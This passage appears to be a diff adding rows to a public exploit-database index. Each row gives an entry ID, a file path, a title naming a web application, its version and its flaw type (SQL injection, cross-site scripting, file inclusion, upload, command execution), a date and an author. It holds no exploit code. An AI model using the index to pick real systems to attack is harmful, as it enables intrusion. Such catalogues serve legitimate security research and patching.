Inclusion",2010-03-05,cr4wl3r,webapps,php, +33717,exploits/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,webapps,multiple, +33718,exploits/php/webapps/33718.txt,"phpCOIN 1.2.1 - 'mod' Local File Inclusion",2010-03-06,_mlk_,webapps,php, +33720,exploits/asp/webapps/33720.txt,"Pre E-Learning Portal - 'search_result.asp' SQL Injection",2010-03-08,NoGe,webapps,asp, +33721,exploits/asp/webapps/33721.txt,"Max Network Technology BBSMAX 4.2 - 'post.aspx' Cross-Site Scripting",2010-03-08,Liscker,webapps,asp, +33722,exploits/asp/webapps/33722.txt,"ASPCode CMS 1.5.8 - 'default.asp' Multiple Cross-Site Scripting Vulnerabilities",2010-03-08,"Alberto Fontanella",webapps,asp, +33723,exploits/php/webapps/33723.html,"KDPics 1.18 - '/admin/index.php' Authentication Bypass",2010-03-08,snakespc,webapps,php, +33724,exploits/php/webapps/33724.txt,"OpenCart 1.3.2 - 'page' SQL Injection",2010-03-07,"Andrés Gómez",webapps,php, +33726,exploits/php/webapps/33726.txt,"TikiWik < 4.2 - Multiple Vulnerabilities",2010-03-09,"Mateusz Drygas",webapps,php, +33727,exploits/php/webapps/33727.txt,"wh-em.com upload 7.0 - Insecure Cookie Authentication Bypass",2010-02-16,indoushka,webapps,php, +33728,exploits/asp/webapps/33728.txt,"IBM ENOVIA SmarTeam - 'LoginPage.aspx' Cross-Site Scripting",2010-03-09,Lament,webapps,asp, +33730,exploits/asp/webapps/33730.txt,"Max Network Technology BBSMAX 4.2 - 'threadid' Cross-Site Scripting",2010-03-10,Liscker,webapps,asp, +33731,exploits/multiple/webapps/33731.txt,"Friendly Technologies TR-069 ACS 2.8.9 - Login SQL Injection",2010-03-10,"Yaniv Miron",webapps,multiple, +33732,exploits/php/webapps/33732.txt,"60cycleCMS - 'select.php' Multiple HTML Injection Vulnerabilities",2010-03-10,"pratul agrawal",webapps,php, +33734,exploits/php/webapps/33734.txt,"DDL CMS 2.1 - 'blacklist.php' Cross-Site Scripting",2010-03-10,ITSecTeam,webapps,php, +33736,exploits/aix/webapps/33736.php,"Plesk 10.4.4/11.0.9 - SSO XML External Entity / Cross-Site Scripting Injection",2014-06-13,"BLacK ZeRo",webapps,aix, +33760,exploits/multiple/webapps/33760.txt,"(Multiple Products) - 'banner.swf' Cross-Site Scripting",2010-03-15,MustLive,webapps,multiple, +33761,exploits/asp/webapps/33761.txt,"Pars CMS - 'RP' Multiple SQL Injections",2010-03-15,Isfahan,webapps,asp, +33740,exploits/hardware/webapps/33740.txt,"Yealink VoIP Phone SIP-T38G - Local File Inclusion",2014-06-13,Mr.Un1k0d3r,webapps,hardware, +33743,exploits/php/webapps/33743.py,"ZeroCMS 1.0 - 'zero_transact_user.php' Handling Privilege Escalation",2014-06-13,"Tiago Carvalho",webapps,php, +33759,exploits/multiple/webapps/33759.txt,"DirectAdmin 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting",2010-03-14,r0t,webapps,multiple, +33748,exploits/php/webapps/33748.txt,"AneCMS 1.0 - 'index.php' Multiple HTML Injection Vulnerabilities",2010-03-11,"pratul agrawal",webapps,php, +33749,exploits/php/webapps/33749.txt,"ARTIS ABTON CMS - Multiple SQL Injections",2010-03-11,MustLive,webapps,php, +33751,exploits/php/webapps/33751.txt,"CodeIgniter 1.0 - 'BASEPATH' Multiple Remote File Inclusions",2010-03-11,eidelweiss,webapps,php, +33753,exploits/php/webapps/33753.txt,"Easynet4u Forum Host - 'topic.php' SQL Injection",2010-03-12,Pr0T3cT10n,webapps,php, +33754,exploits/php/webapps/33754.txt,"pMyAdmin 3.3.5.1 - 'db_create.php' Cross-Site Scripting",2010-03-12,Liscker,webapps,php, +40351,exploits/php/webapps/40351.txt,"Jobberbase 2.0 - Multiple Vulnerabilities",2016-09-08,"Ross Marks",webapps,php,80 +33756,exploits/php/webapps/33756.txt,"Joomla! Component com_seek - 'id' SQL Injection",2010-03-13,"DevilZ TM",webapps,php, +33757,exploits/php/webapps/33757.txt,"Joomla! Component com_d-greinar - 'maintree' Cross-Site Scripting",2010-03-13,"DevilZ TM",webapps,php, +33758,exploits/asp/webapps/33758.txt,"Zigurrat Farsi CMS - '/manager/textbox.asp' SQL Injection",2010-03-15,Isfahan,webapps,asp, +33762,exploits/php/webapps/33762.txt,"Andromeda 1.9.2 - 's' Cross-Site Scripting / Session Fixation",2010-03-15,indoushka,webapps,php, +33763,exploits/php/webapps/33763.txt,"Domain Verkaus & Auktions Portal - 'index.php' SQL Injection",2010-03-15,"Easy Laster",webapps,php, +33764,exploits/multiple/webapps/33764.txt,"Dojo Toolkit 1.4.1 - '/dijit/tests/_testCommon.js?theme' Cross-Site Scripting",2010-03-15,"Adam Bixby",webapps,multiple, +33765,exploits/multiple/webapps/33765.txt,"Dojo Toolkit 1.4.1 - '/doh/runner.html' Multiple Cross-Site Scripting Vulnerabilities",2010-03-15,"Adam Bixby",webapps,multiple, +33766,exploits/php/webapps/33766.txt,"Joomla! Component com_as - 'catid' SQL Injection",2010-03-16,N2n-Hacker,webapps,php, +33787,exploits/php/webapps/33787.txt,"RepairShop2 - 'index.php?Prod' Cross-Site Scripting",2010-03-23,kaMtiEz,webapps,php, +33769,exploits/php/webapps/33769.txt,"eFront 3.5.5 - 'langname' Local File Inclusion",2010-03-17,7Safe,webapps,php, +33771,exploits/php/webapps/33771.txt,"Joomla! Component com_alert - 'q_item' SQL Injection",2010-03-17,N2n-Hacker,webapps,php, +33772,exploits/php/webapps/33772.txt,"PHPBB2 Plus 1.53 - 'kb.php' SQL Injection",2010-03-17,Gamoscu,webapps,php, +33773,exploits/php/webapps/33773.txt,"tenfourzero.net Shutter 0.1.4 - 'admin.html' Multiple SQL Injections",2010-03-18,blake,webapps,php, +33776,exploits/php/webapps/33776.txt,"Kempt SiteDone 2.0 - '/detail.php' Cross-Site Scripting / SQL Injection",2010-03-18,d3v1l,webapps,php, +33777,exploits/php/webapps/33777.txt,"PHPWind 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-03-19,Liscker,webapps,php, +33779,exploits/jsp/webapps/33779.txt,"agXchange ESM - 'ucschcancelproc.jsp' Open Redirection",2010-03-22,Lament,webapps,jsp, +33781,exploits/php/webapps/33781.txt,"Lussumo Vanilla 1.1.10 - 'definitions.php' Multiple Remote File Inclusions",2010-03-23,eidelweiss,webapps,php, +33782,exploits/php/webapps/33782.txt,"PHPKIT 1.6.x - 'b-day.php' Addon SQL Injection",2010-03-22,n3w7u,webapps,php, +33784,exploits/php/webapps/33784.txt,"vBulletin 4.0.2 - Search Cross-Site Scripting",2010-03-19,5ubzer0,webapps,php, +33785,exploits/jsp/webapps/33785.txt,"agXchange ESM - 'ucquerydetails.jsp' Cross-Site Scripting",2010-03-23,Lament,webapps,jsp, +33788,exploits/php/webapps/33788.pl,"PHPAuthent 0.2.1 - 'useradd.php' Multiple HTML Injection Vulnerabilities",2010-03-23,Yoyahack,webapps,php, +33792,exploits/hardware/webapps/33792.txt,"Motorola SBG901 Wireless Modem - Cross-Site Request Forgery",2014-06-17,"Blessen Thomas",webapps,hardware, +33793,exploits/php/webapps/33793.txt,"Kasseler CMS News Module - 'id' SQL Injection",2010-03-23,Palyo34,webapps,php, +33794,exploits/php/webapps/33794.txt,"SpringSource (Multiple Products) - Multiple HTML Injection Vulnerabilities",2010-03-23,"Aaron Kulick",webapps,php, +33795,exploits/php/webapps/33795.txt,"Joomla! Component com_aml_2 - 'art' SQL Injection",2010-03-23,Metropolis,webapps,php, +33796,exploits/php/webapps/33796.txt,"Joomla! Component com_cb - 'cat' SQL Injection",2010-03-23,"DevilZ TM",webapps,php, +33797,exploits/php/webapps/33797.txt,"Joomla! Component com_jresearch - 'Controller' Local File Inclusion",2010-03-24,"Chip d3 bi0s",webapps,php, +33803,exploits/hardware/webapps/33803.txt,"ZTE WXV10 W300 - Multiple Vulnerabilities",2014-06-18,"Osanda Malith",webapps,hardware, +34141,exploits/php/webapps/34141.txt,"AneCMS 1.x - '/modules/blog/index.php' SQL Injection",2010-06-11,"High-Tech Bridge SA",webapps,php, +33976,exploits/php/webapps/33976.html,"Saurus CMS 4.7 - 'edit.php' Cross-Site Scripting",2010-05-11,"High-Tech Bridge SA",webapps,php, +33809,exploits/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,webapps,php, +33812,exploits/php/webapps/33812.txt,"Joomla! Component com_weblinks - 'id' SQL Injection",2010-03-29,"Pouya Daneshmand",webapps,php, +33813,exploits/php/webapps/33813.html,"WordPress Plugin Fuctweb CapCC 1.0 - 'plugins.php' SQL Injection",2008-12-13,MustLive,webapps,php, +33814,exploits/php/webapps/33814.txt,"Piwik 0.5.5 - 'form_url' Cross-Site Scripting",2010-03-31,garwga,webapps,php, +33815,exploits/php/webapps/33815.txt,"OSSIM 2.2.1 - '$_SERVER['PHP_SELF']' Cross-Site Scripting",2010-03-31,"CONIX Security",webapps,php, +33818,exploits/php/webapps/33818.txt,"web2Project 3.1 - Multiple Vulnerabilities",2014-06-19,"High-Tech Bridge SA",webapps,php,80 +33820,exploits/php/webapps/33820.txt,"PotatoNews 1.0.2 - 'nid' Multiple Local File Inclusions",2010-04-07,mat,webapps,php, +33821,exploits/php/webapps/33821.html,"n-cms-equipe 1.1c.Debug - Multiple Local File Inclusions",2010-02-24,ITSecTeam,webapps,php, +33822,exploits/hardware/webapps/33822.sh,"D-Link DSL-2760U-E1 - Persistent Cross-Site Scripting",2014-06-21,"Yuval tisf Nativ",webapps,hardware, +33853,exploits/php/webapps/33853.txt,"Kleophatra CMS 0.1.1 - 'module' Cross-Site Scripting",2010-04-19,anT!-Tr0J4n,webapps,php, +33825,exploits/asp/webapps/33825.txt,"Ziggurat Farsi CMS - 'id' Cross-Site Scripting",2010-04-15,"Pouya Daneshmand",webapps,asp, +33827,exploits/php/webapps/33827.txt,"Istgah For Centerhost - 'view_ad.php' Cross-Site Scripting",2010-04-07,indoushka,webapps,php, +33830,exploits/php/webapps/33830.txt,"Lunar CMS 3.3 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2014-06-21,LiquidWorm,webapps,php, +33832,exploits/php/webapps/33832.txt,"TANDBERG Video Communication Server 4.2.1/4.3.0 - Multiple Remote Vulnerabilities",2010-04-12,"Jon Hart",webapps,php, +33833,exploits/php/webapps/33833.txt,"Blog System 1.x - Multiple Input Validation Vulnerabilities",2010-04-12,cp77fk4r,webapps,php, +33834,exploits/php/webapps/33834.txt,"Vana CMS - 'Filename' Arbitrary File Download",2010-04-13,"Pouya Daneshmand",webapps,php, +33835,exploits/php/webapps/33835.txt,"AneCMS 1.0 - Multiple Local File Inclusions",2010-04-12,"AmnPardaz Security Research Team",webapps,php, +33840,exploits/asp/webapps/33840.txt,"Ziggurat Farsi CMS - 'bck' Directory Traversal",2010-04-15,"Pouya Daneshmand",webapps,asp, +33857,exploits/php/webapps/33857.txt,"e107 0.7.x - '/e107_admin/banner.php' SQL Injection",2010-04-21,"High-Tech Bridge SA",webapps,php, +33997,exploits/php/webapps/33997.txt,"NPDS REvolution 10.02 - 'download.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",webapps,php, +33998,exploits/php/webapps/33998.html,"Joomla! Component JComments 2.1 - 'ComntrNam' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",webapps,php, +33846,exploits/php/webapps/33846.txt,"ZeroCMS 1.0 - 'zero_transact_article.php' SQL Injection",2014-06-23,"Filippos Mastrogiannis",webapps,php, +33851,exploits/php/webapps/33851.txt,"Multiple WordPress Plugins (TimThumb 2.8.13 / WordThumb 1.07) - 'WebShot' Remote Code Execution",2014-06-24,@u0x,webapps,php, +33854,exploits/php/webapps/33854.txt,"vBulletin Two-Step External Link Module - 'externalredirect.php' Cross-Site Scripting",2010-04-20,"Edgard Chammas",webapps,php, +33881,exploits/php/webapps/33881.txt,"PowerEasy 2006 - 'ComeUrl' Cross-Site Scripting",2010-04-24,Liscker,webapps,php, +33856,exploits/php/webapps/33856.txt,"Viennabux Beta! - 'cat' SQL Injection",2010-04-09,"Easy Laster",webapps,php, +33858,exploits/php/webapps/33858.txt,"DBSite wb CMS - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-04-21,The_Exploited,webapps,php, +34146,exploits/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",webapps,php, +34147,exploits/php/webapps/34147.txt,"JForum 2.1.8 - 'Username' Cross-Site Scripting",2010-06-06,"Adam Baldwin",webapps,php, +33866,exploits/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password Cross-Site Request Forgery",2014-06-25,nopesled,webapps,hardware, +33867,exploits/php/webapps/33867.txt,"Lunar CMS 3.3 - Unauthenticated Remote Command Execution",2014-06-25,LiquidWorm,webapps,php, +34142,exploits/php/webapps/34142.txt,"MODx 1.0.3 - 'index.php' Multiple SQL Injections",2010-06-14,"High-Tech Bridge SA",webapps,php, +33870,exploits/php/webapps/33870.txt,"FlashCard 2.6.5 - 'id' Cross-Site Scripting",2010-04-22,Valentin,webapps,php, +33874,exploits/php/webapps/33874.txt,"Ektron CMS400.NET 7.5.2 - Multiple Vulnerabilities",2010-04-26,"Richard Moore",webapps,php, +33875,exploits/php/webapps/33875.txt,"HuronCMS - 'index.php' Multiple SQL Injections",2010-03-30,mat,webapps,php, +33882,exploits/php/webapps/33882.txt,"CyberCMS - 'faq.php' SQL Injection",2009-11-26,hc0de,webapps,php, +33883,exploits/php/webapps/33883.txt,"Kasseler CMS 2.0.5 - 'index.php' Cross-Site Scripting",2010-04-26,indoushka,webapps,php, +33884,exploits/php/webapps/33884.txt,"Zikula Application Framework 1.2.2 - 'ZLanguage.php?lang' Cross-Site Scripting",2010-04-13,"High-Tech Bridge SA",webapps,php, +33885,exploits/php/webapps/33885.txt,"Zikula Application Framework 1.2.2 - 'index.php?func' Cross-Site Scripting",2010-04-13,"High-Tech Bridge SA",webapps,php, +33887,exploits/cgi/webapps/33887.txt,"Mailspect Control Panel 4.0.5 - Multiple Vulnerabilities",2014-06-27,"Onur Alanbel (BGA)",webapps,cgi, +33888,exploits/php/webapps/33888.txt,"ProArcadeScript - 'search.php' Cross-Site Scripting",2010-04-27,Sid3^effects,webapps,php, +33889,exploits/php/webapps/33889.txt,"SmartBlog 1.3 - SQL Injection / Cross-Site Scripting",2010-04-27,indoushka,webapps,php, +33894,exploits/multiple/webapps/33894.txt,"Python CGIHTTPServer - Encoded Directory Traversal",2014-06-27,"RedTeam Pentesting",webapps,multiple, +33896,exploits/php/webapps/33896.txt,"WordPress Plugin Simple Share Buttons Adder 4.4 - Multiple Vulnerabilities",2014-06-27,dxw,webapps,php,80 +33897,exploits/multiple/webapps/33897.txt,"Endeca Latitude 2.2.2 - Cross-Site Request Forgery",2014-06-27,"RedTeam Pentesting",webapps,multiple, +33906,exploits/php/webapps/33906.txt,"velBox 1.2 - Insecure Cookie Authentication Bypass",2010-04-28,indoushka,webapps,php, +33908,exploits/php/webapps/33908.txt,"Your Articles Directory - Login Option SQL Injection",2010-04-29,Sid3^effects,webapps,php, +33909,exploits/php/webapps/33909.txt,"Tele Data's Contact Management Server 0.9 - 'Username' SQL Injection",2010-04-28,"John Leitch",webapps,php, +33960,exploits/php/webapps/33960.txt,"ECShop 2.7.2 - 'category.php' SQL Injection",2010-05-07,Liscker,webapps,php, +33967,exploits/php/webapps/33967.txt,"Chipmunk NewsLetter 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-20,b0telh0,webapps,php, +33969,exploits/php/webapps/33969.txt,"eFront 3.x - 'ask_chat.php' SQL Injection",2010-05-09,"Stefan Esser",webapps,php, +33970,exploits/php/webapps/33970.txt,"EasyPublish CMS 23.04.2010 - URI Cross-Site Scripting",2010-05-10,"High-Tech Bridge SA",webapps,php, +33913,exploits/php/webapps/33913.html,"osCommerce 3.0a5 - Local File Inclusion / HTML Injection",2010-04-30,"Jordi Chancel",webapps,php, +33914,exploits/php/webapps/33914.txt,"4x CMS - 'login.php' Multiple SQL Injections",2010-03-21,cr4wl3r,webapps,php, +33915,exploits/php/webapps/33915.txt,"Campsite 3.x - 'article_id' SQL Injection",2010-04-30,"Stefan Esser",webapps,php, +33916,exploits/cfm/webapps/33916.txt,"Mango Blog 1.4.1 - '/archives.cfm/search' Cross-Site Scripting",2010-05-03,MustLive,webapps,cfm, +33917,exploits/php/webapps/33917.txt,"Billwerx RC5.2.2 PL2 - 'primary_number' SQL Injection",2010-05-02,indoushka,webapps,php, +33918,exploits/php/webapps/33918.txt,"CF Image Hosting Script 1.1 - 'upload.php' Arbitrary File Upload",2010-05-01,The.Morpheus,webapps,php, +33919,exploits/php/webapps/33919.txt,"NolaPro Enterprise 4.0.5538 - Cross-Site Scripting / SQL Injection",2010-05-01,ekse,webapps,php, +33921,exploits/php/webapps/33921.txt,"IslamSound - Multiple SQL Injections",2010-05-03,JIKO,webapps,php, +33922,exploits/php/webapps/33922.txt,"CH-CMS.ch 2 - Multiple Arbitrary File Upload Vulnerabilities",2010-03-15,EL-KAHINA,webapps,php, +33923,exploits/asp/webapps/33923.txt,"SamaGraph CMS - 'inside.aspx' SQL Injection",2010-03-11,K053,webapps,asp, +33925,exploits/php/webapps/33925.txt,"ecoCMS 18.4.2010 - 'admin.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",webapps,php, +33953,exploits/php/webapps/33953.txt,"Zurmo CRM - Persistent Cross-Site Scripting",2014-07-02,Provensec,webapps,php,80 +33959,exploits/asp/webapps/33959.txt,"Consona - 'n6plugindestructor.asp' Cross-Site Scripting",2010-05-07,"Ruben Santamarta",webapps,asp, +33954,exploits/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",webapps,php,4081 +33933,exploits/php/webapps/33933.txt,"ThinkPHP 2.0 - 'index.php' Cross-Site Scripting",2010-02-09,zx,webapps,php, +33934,exploits/php/webapps/33934.txt,"eZoneScripts (Multiple Scripts) - Insecure Cookie Authentication Bypass",2009-02-09,JIKO,webapps,php, +33958,exploits/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 - 'sid' SQL Injection",2010-05-06,"Christophe de la Fuente",webapps,cgi, +33957,exploits/php/webapps/33957.txt,"kloNews 2.0 - 'cat.php' Cross-Site Scripting",2010-01-20,cr4wl3r,webapps,php, +33937,exploits/multiple/webapps/33937.txt,"WordPress Plugin TYPO3 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,webapps,multiple, +33939,exploits/java/webapps/33939.txt,"ShopEx Single 4.5.1 - 'errinfo' Cross-Site Scripting",2010-02-06,cp77fk4r,webapps,java, +33942,exploits/jsp/webapps/33942.txt,"IBM Algorithmics RICOS 4.5.0 < 4.7.0 - Multiple Vulnerabilities",2014-07-01,"SEC Consult",webapps,jsp,80 +33945,exploits/php/webapps/33945.txt,"DeluxeBB 1.x - 'newpost.php' SQL Injection",2010-05-06,"Stefan Esser",webapps,php, +33946,exploits/php/webapps/33946.txt,"EmiratesHost - Insecure Cookie Authentication Bypass",2010-02-01,jago-dz,webapps,php, +33947,exploits/php/webapps/33947.txt,"Last Wizardz - 'id' SQL Injection",2010-01-31,"Sec Attack Team",webapps,php, +33948,exploits/cfm/webapps/33948.txt,"Site Manager 3.0 - 'id' SQL Injection",2010-01-31,"Sec Attack Team",webapps,cfm, +33950,exploits/php/webapps/33950.txt,"HAWHAW - 'newsread.php' SQL Injection",2010-01-31,s4r4d0,webapps,php, +34103,exploits/cgi/webapps/34103.txt,"Barracuda Networks Message Archiver 650 - Persistent Cross-Site Scripting",2014-07-18,Vulnerability-Lab,webapps,cgi,3378 +33972,exploits/php/webapps/33972.txt,"Advanced Poll 2.0 - 'mysql_host' Cross-Site Scripting",2010-05-10,"High-Tech Bridge SA",webapps,php, +33975,exploits/php/webapps/33975.html,"Affiliate Store Builder - 'edit_cms.php' Multiple SQL Injections",2010-05-11,"High-Tech Bridge SA",webapps,php, +33978,exploits/php/webapps/33978.txt,"TomatoCMS 2.0.x - SQL Injection",2010-05-12,"Russ McRee",webapps,php, +33979,exploits/php/webapps/33979.txt,"C99Shell 1.0 Pre-Release build 16 (Web Shell) - 'ch99.php' Cross-Site Scripting",2010-05-19,indoushka,webapps,php, +33982,exploits/php/webapps/33982.txt,"NPDS REvolution 10.02 - 'download.php' SQL Injection",2010-05-13,"High-Tech Bridge SA",webapps,php, +33983,exploits/php/webapps/33983.txt,"Frog CMS 0.9.5 - Arbitrary File Upload",2014-07-06,"Javid Hussain",webapps,php, +33985,exploits/php/webapps/33985.txt,"NPDS REvolution 10.02 - 'topic' Cross-Site Scripting",2010-05-13,"High-Tech Bridge SA",webapps,php, +33986,exploits/php/webapps/33986.txt,"PHP File Uploader - Arbitrary File Upload",2010-01-03,indoushka,webapps,php, +33987,exploits/php/webapps/33987.txt,"PHP Banner Exchange 1.2 - 'signupconfirm.php' Cross-Site Scripting",2010-01-03,indoushka,webapps,php, +33992,exploits/asp/webapps/33992.txt,"Platnik 8.1.1 - Multiple SQL Injections",2010-05-17,podatnik386,webapps,asp, +33993,exploits/php/webapps/33993.txt,"Planet Script 1.x - 'idomains.php' Cross-Site Scripting",2010-05-14,Mr.ThieF,webapps,php, +33994,exploits/php/webapps/33994.txt,"PonVFTP - Insecure Cookie Authentication Bypass",2010-05-17,SkuLL-HackeR,webapps,php, +33995,exploits/multiple/webapps/33995.txt,"Blaze Apps 1.x - SQL Injection / HTML Injection",2010-01-19,"AmnPardaz Security Research Team",webapps,multiple, +33996,exploits/ios/webapps/33996.txt,"Photo Org WonderApplications 8.3 iOS - Local File Inclusion",2014-07-07,Vulnerability-Lab,webapps,ios, +33999,exploits/php/webapps/33999.txt,"Mobile Chat 2.0.2 - 'chatsmileys.php' Cross-Site Scripting",2010-01-18,indoushka,webapps,php, +34000,exploits/multiple/webapps/34000.txt,"Serialsystem 1.0.4 Beta - 'list' Cross-Site Scripting",2010-01-18,indoushka,webapps,multiple, +34003,exploits/php/webapps/34003.txt,"Joomla! Component Percha Image Attach 1.1 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php, +34004,exploits/php/webapps/34004.txt,"Joomla! Component Percha Fields Attach 1.0 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php, +34005,exploits/php/webapps/34005.txt,"Joomla! Component Percha Downloads Attach 1.1 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php, +34006,exploits/php/webapps/34006.txt,"Joomla! Component Percha Gallery 1.6 Beta - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php, +34007,exploits/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Vulnerabilities",2014-07-08,"Deepak Rathore",webapps,php, +34008,exploits/php/webapps/34008.txt,"Joomla! Component Percha Multicategory Article 0.6 - 'Controller' Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php, +34011,exploits/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP - 'search.php' Cross-Site Scripting",2010-05-19,"Andrea Bocchetti",webapps,php, +34012,exploits/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 - '/resin-admin/digest.php' Multiple Cross-Site Scripting Vulnerabilities",2010-05-19,xuanmumu,webapps,php, +34014,exploits/php/webapps/34014.txt,"Web 2.0 Social Network Freunde Community System - 'user.php' SQL Injection",2010-05-08,"Easy Laster",webapps,php, +34015,exploits/php/webapps/34015.txt,"SoftDirec 1.05 - 'delete_confirm.php' Cross-Site Scripting",2010-05-19,indoushka,webapps,php, +34016,exploits/php/webapps/34016.txt,"Snipe Gallery 3.1 - 'gallery.php?cfg_admin_path' Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",webapps,php, +34017,exploits/php/webapps/34017.txt,"Snipe Gallery 3.1 - 'image.php?cfg_admin_path' Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",webapps,php, +34021,exploits/php/webapps/34021.txt,"Joomla! Component com_horses - 'id' SQL Injection",2010-05-19,"Kernel Security Group",webapps,php, +34022,exploits/php/webapps/34022.txt,"StivaSoft Stiva SHOPPING CART 1.0 - 'demo.php' Cross-Site Scripting",2010-01-13,PaL-D3v1L,webapps,php, +34023,exploits/php/webapps/34023.txt,"Lisk CMS 4.4 - 'id' Multiple Cross-Site Scripting / SQL Injections",2010-05-20,"High-Tech Bridge SA",webapps,php, +34024,exploits/php/webapps/34024.txt,"Triburom - 'forum.php' Cross-Site Scripting",2010-01-15,ViRuSMaN,webapps,php, +34030,exploits/lin_x86/webapps/34030.txt,"Infoblox 6.8.2.11 - OS Command Injection",2014-07-10,"Nate Kettlewell",webapps,lin_x86, +34025,exploits/php/webapps/34025.txt,"C99Shell (Web Shell) - 'c99.php' Authentication Bypass",2014-07-10,Mandat0ry,webapps,php, +34029,exploits/php/webapps/34029.txt,"Specialized Data Systems Parent Connect 2010.04.11 - Multiple SQL Injections",2010-05-21,epixoip,webapps,php, +34031,exploits/php/webapps/34031.txt,"gpEasy CMS 1.6.2 - 'editing_files.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",webapps,php, +34032,exploits/php/webapps/34032.txt,"NPDS REvolution 10.02 - 'admin.php' Cross-Site Request Forgery",2010-05-20,"High-Tech Bridge SA",webapps,php, +34034,exploits/asp/webapps/34034.txt,"cyberhost - 'default.asp' SQL Injection",2010-05-22,redst0rm,webapps,asp, +34035,exploits/php/webapps/34035.sjs,"OpenForum 2.2 b005 - 'saveAsAttachment()' Method Arbitrary File Creation",2010-05-23,"John Leitch",webapps,php, +34062,exploits/php/webapps/34062.txt,"Shopizer 1.1.5 - Multiple Vulnerabilities",2014-07-14,"SEC Consult",webapps,php,80 +34038,exploits/php/webapps/34038.txt,"Aerohive HiveOS 5.1r5 < 6.1r5 - Multiple Vulnerabilities",2014-07-12,DearBytes,webapps,php, +34189,exploits/php/webapps/34189.txt,"Sphider Search Engine 1.3.6 - Multiple Vulnerabilities",2014-07-28,"Mike Manzotti",webapps,php,80 +34040,exploits/php/webapps/34040.txt,"RazorCMS 1.0 - '/admin/index.php' HTML Injection",2010-05-24,"High-Tech Bridge SA",webapps,php, +34041,exploits/php/webapps/34041.txt,"Getsimple CMS 2.01 - 'components.php' Cross-Site Scripting",2010-05-24,"High-Tech Bridge SA",webapps,php, +34042,exploits/php/webapps/34042.txt,"Ruubikcms 1.0.3 - 'index.php' Cross-Site Scripting",2010-05-24,"High-Tech Bridge SA",webapps,php, +34043,exploits/php/webapps/34043.txt,"360 Web Manager 3.0 - 'webpages-form-led-edit.php' SQL Injection",2010-05-24,"High-Tech Bridge SA",webapps,php, +34044,exploits/php/webapps/34044.txt,"md5 Encryption Decryption PHP Script - 'index.php' Cross-Site Scripting",2010-05-26,indoushka,webapps,php, +34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",webapps,php, +34052,exploits/php/webapps/34052.py,"osCommerce Visitor Web Stats AddOn - 'Accept-Language' Header SQL Injection",2010-05-28,"Christopher Schramm",webapps,php, +34053,exploits/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injections",2010-05-28,"High-Tech Bridge SA",webapps,php, +34054,exploits/php/webapps/34054.txt,"GR Board 1.8.6 - 'page.php' Remote File Inclusion",2010-05-30,eidelweiss,webapps,php, +34055,exploits/php/webapps/34055.txt,"CMScout 2.08 - Cross-Site Scripting",2010-05-28,XroGuE,webapps,php, +40716,exploits/php/webapps/40716.py,"SweetRice 1.5.1 - Arbitrary File Upload",2016-11-06,"Ashiyane Digital Security Team",webapps,php, +34057,exploits/php/webapps/34057.txt,"wsCMS - 'news.php' Cross-Site Scripting",2010-05-31,cyberlog,webapps,php, +34067,exploits/php/webapps/34067.txt,"Smart Statistics 1.0 - 'smart_Statistics_admin.php' Cross-Site Scripting",2010-01-10,R3d-D3V!L,webapps,php, +34068,exploits/php/webapps/34068.html,"CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery",2010-01-01,"Truong Thao Nguyen",webapps,php, +34070,exploits/php/webapps/34070.txt,"Datetopia Match Agency BiZ - Multiple Cross-Site Scripting Vulnerabilities",2010-01-07,R3d-D3V!L,webapps,php, +34071,exploits/php/webapps/34071.txt,"Joomla! Component com_sar_news - 'id' SQL Injection",2010-06-02,LynX,webapps,php, +34072,exploits/php/webapps/34072.txt,"Hexjector 1.0.7.2 - 'hexjector.php' Cross-Site Scripting",2010-06-01,hexon,webapps,php, +34073,exploits/php/webapps/34073.py,"TCExam 10.1.7 - '/admin/code/tce_functions_tcecode_editor.php' Arbitrary File Upload",2010-06-02,"John Leitch",webapps,php, +34136,exploits/multiple/webapps/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Local File Inclusion",2010-06-21,"Pouya Daneshmand",webapps,multiple, +34086,exploits/linux/webapps/34086.txt,"BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",webapps,linux,443 +34087,exploits/php/webapps/34087.txt,"Joomla! Component Youtube Gallery 4.1.7 - SQL Injection",2014-07-16,"Pham Van Khanh",webapps,php,80 +34153,exploits/php/webapps/34153.txt,"2DayBiz ybiz Network Community Script - SQL Injection / Cross-Site Scripting",2010-06-16,Sid3^effects,webapps,php, +34138,exploits/php/webapps/34138.txt,"VideoWhisper PHP 2 Way Video Chat - 'r' Cross-Site Scripting",2010-06-14,Sid3^effects,webapps,php, 